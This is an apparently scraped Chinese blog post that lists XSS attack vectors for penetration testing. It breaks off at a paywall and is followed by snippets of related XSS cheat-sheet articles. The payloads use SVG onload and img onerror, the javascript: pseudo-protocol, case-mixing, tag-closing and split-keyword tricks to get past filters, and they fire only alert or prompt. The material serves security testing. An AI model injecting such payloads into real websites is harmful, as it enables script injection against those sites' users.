XSS攻击向量推荐

最新推荐文章于 2022-03-29 12:17:14 发布
最新推荐文章于 2022-03-29 12:17:14 发布
阅读量381 收藏
点赞数
分类专栏: 渗透测试 文章标签: xss 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caoxinjian423/article/details/108364208
版权

1、SVG标签之大小写、“和</script>进行闭合标签、<!--注释,进行防御的绕过:

<sVg/OnLOaD=prompt(9)>

"><sVg/OnLOaD=prompt(9)>

</script><sVg/OnLOaD=prompt(9)>

"><svg/οnlοad=alert(/xssposed/)><!--

2、利用HTML标签属性值执行XSS

  • 很多HTML标记中的属性都支持javascript:[code]伪协议的形式:

<img src = "javascript:alert(‘xss‘);">

  • 过滤了javascript等敏感字符串:

< IMG SRC="jav ascript:alert('XSS');" >;     

  •  畸形的img标签:

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

3、特殊src属性的img标签

  • 触发onerror事件:

<IMG SRC=0 οnerrοr=alert(document.domain)></img>      --渗透测试用过的攻击向量

<IMG SRC=/ οnerrοr=alert(String.fromCharCode(88,83,83))></img>

  • 使用默认为空的SRC属性:

<IMG SRC= οnmοu

最低0.47元/天 解锁文章
书院二层楼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
H5SC, HTML5安全Cheatsheet一个HTML5相关的XSS攻击向量集合.zip
09-18
H5SC, HTML5安全Cheatsheet一个HTML5相关的XSS攻击向量集合 HTML5安全功能这是H5SC或者HTML5安全插件的新主页。 在这里你可以找到三种东西:一个 Collection 相关的XSS攻击向量一组用于XSS测试的有用文件一组以前隐藏的用于XSS测试的特性 XSS矢量可以在以下
跨站脚本(XSS)备忘单-2019版
12-16 2万+
这是一份跨站脚本(XSS)备忘录,收集了大量的XSS攻击向量,包含了各种事件处理、通讯协议、特殊属性、限制字符、编码方式、沙箱逃逸等技巧,可以帮助渗透测试人员绕过WAF和过滤机制。 译者注:原文由Portswigger公司的Web安全学院于2019年定期更新,对的,就是那家开发著名渗透工具Burp suite的公司,最后更新时间:2019年11月8日星期五10:58:07。 事件...
一种新型的XSSI攻击向量
weixin_34167043的博客
08-01 449
一、引言 最近在鼓捣跨站脚本包含(XSSI)攻击时,我突然意识到可以通过HTTP状态码来玩泄漏信息和跨域。如果你想到的是“XSSI登录神谕”,那么说明你的已经上道了,但该攻击还可以扩展到更多的情形中。这里说的登录神谕通常是根据当前认证状态来决定加载与否的一些JavaScript文件。然而,这种攻击还可以针对HTML、JSON、XML或任意的内容类型。这...
XSS攻击
gghhb12的博客
03-29 4616
XSS攻击
下一个大型网络攻击向量将或是API
zhangzhen199104的博客
07-07 375
实际上,网络攻击者在计划攻击时已经瞄准了API这个目标。面包店咖啡连锁店Panera Bread公司的数据泄露就是一个很好的例子,该公司在其网站上留下了未经验证的API端点,允许任何人查看客户信息,如用户名、电子邮件地址、电话号码、信用卡的最后四位数字、出生日期等。最终,在8个多月的时间内有3700万客户数据被泄露。这就提出了一个问题:如何最大限度地减少与API相关的不断增长的网络安全风险,而不会...
存储型XSS攻击向量自动化生成技术* (2012年)
05-21
针对危害性最为严重的存储型XSS漏洞的特点及其触发方式,设计并实现了一款自动生成存储型XSS攻击向量的工具.使用该工具对中国2个大型视频分享网站的日志发布系统进行测试,发现6类导致存储型XSS漏洞的攻击向量....
论文研究-一种自动生成XSS攻击向量的方法 .pdf
08-14
一种自动生成XSS攻击向量的方法,冯亦彤,罗守山,针对XSS漏洞检测工具在攻击向量选取上的不足,本文提出了一种自动生成XSS攻击向量的方法。为了优化攻击向量的生成,本文从三个方面
H5SC:HTML5安全备忘单-与HTML5相关的XSS攻击向量的集合
04-05
与HTML5相关的XSS攻击向量的集合 一组用于XSS测试的有用文件 一组以前隐藏的功能,可用于XSS测试 XSS向量 XSS向量的集合可以在这里找到: : 有用的文件 我们发布了在各种情况下对XSS测试有用的文件列表。 当前,...
XSS漏洞检测使用优化的攻击向量
03-07
XSS漏洞检测使用优化的攻击向量
不需要字母构建的XSS向量
逐日者的博客
03-08 366
 之前我在玩一个XSS游戏的时候突然有了些想法,于是便有了这篇文章。在此,我将分享一个以前没有接触过的一个XSS攻击向量。相同水平的前提下,在攻击向量中不使用任何字母,且必须调用alert(1)。闲话少说,看这里: ""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[
XSS跨站攻击
思维小刀
04-26 529
1.简介跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点, 进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进行某...
XSS跨站脚本攻击
songshuzhong的博客
05-14 287
一、简介      跨站脚本攻击(cross site scripting),web应用最主流攻击方法;为了避免和层叠样式表(cascading style sheet)重名而简写成XSS。1.1 成因      系统太过于信任用户输入,而没有对其提交的数据进行转译处理或过滤,使得提交的数据中存在可执行代码并嵌入到web页面中。1.2 危害1. 盗取用户账号2.控制敏感数据3.非法转账4.强制发送...
xss详解(一)
捷的博客
04-11 636
文章目录XSS详解(一)一、概述二、XSS的分类2.1反射型XSS2.2存储型XSS2.3DOM型XSS三、常见XSS攻击向量四、xss测试流程图 XSS详解(一) 一、概述 XSS(Cross Site Scripting)缩写为CSS,因易与层叠样式表CSS混淆,所以将跨站脚本攻击缩写为XSSXSS攻击(跨站脚本攻击)通常指的是通过网页开发时留下的漏洞,注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。 产生的原因通常是在开发阶段没有实施过滤或净化措施、或过滤的不严格。 这些恶意网
(转自360安全客)深入理解浏览器解析机制和XSS向量编码
weixin_30364147的博客
10-25 231
(译者注:由于某些词汇翻译成中文后很生硬,因此把相应的英文标注在其后以便理解。这篇文章讲的内容很基础,同时也很重要,希望对大家有所帮助。) 这篇文章将要深入理解HTML、URL和JavaScript的规范细则和解析器,以及在解析一段XSS脚本时他们之间有着怎样的差别。这些内容对读者的难易程度取决于读者对HTML规范和浏览器解析的知识是否充足。当然,我向您保证这篇文章比较长,因此请准备一小时或...
xss妙用,快速测试xss漏洞。
椰树ii
05-24 1万+
#介绍# 这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site Scripting) Prevention Cheat Shee
Bypass xss过滤的测试方法
中华传奇
07-27 503
0x00 背景 本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽说是绕WAF的,但这里还是根据WAF中的正则缺陷来绕过测试方法,并不是协议上...
XSS攻击常识及常见的XSS攻击脚本汇总
热门推荐
qw_xingzhe的专栏
06-16 7万+
一、什么是XSS?XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。二、XSS有什么危害?当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。关于XSS有关危害,我这里中罗列...
XSS过滤速查表
Fizz`s Blog
11-12 2976
初见于Freebuf,放在这里收藏一下。 就是OWASP的速查表 不过是中文的 1.介绍 这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站,将由OWASP维护和完善它。OWASP
XSS攻击指南:绕过策略与检测方法
以下是一些关键的XSS攻击向量: 1. **基础XSS探测**: - 常见的探测字符串如 `';alert(String.fromCharCode(88,83,83))` 可以在许多情况下触发弹窗,显示 "XSS" 字样,表明存在XSS漏洞。编码这些字符是为了防止被...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值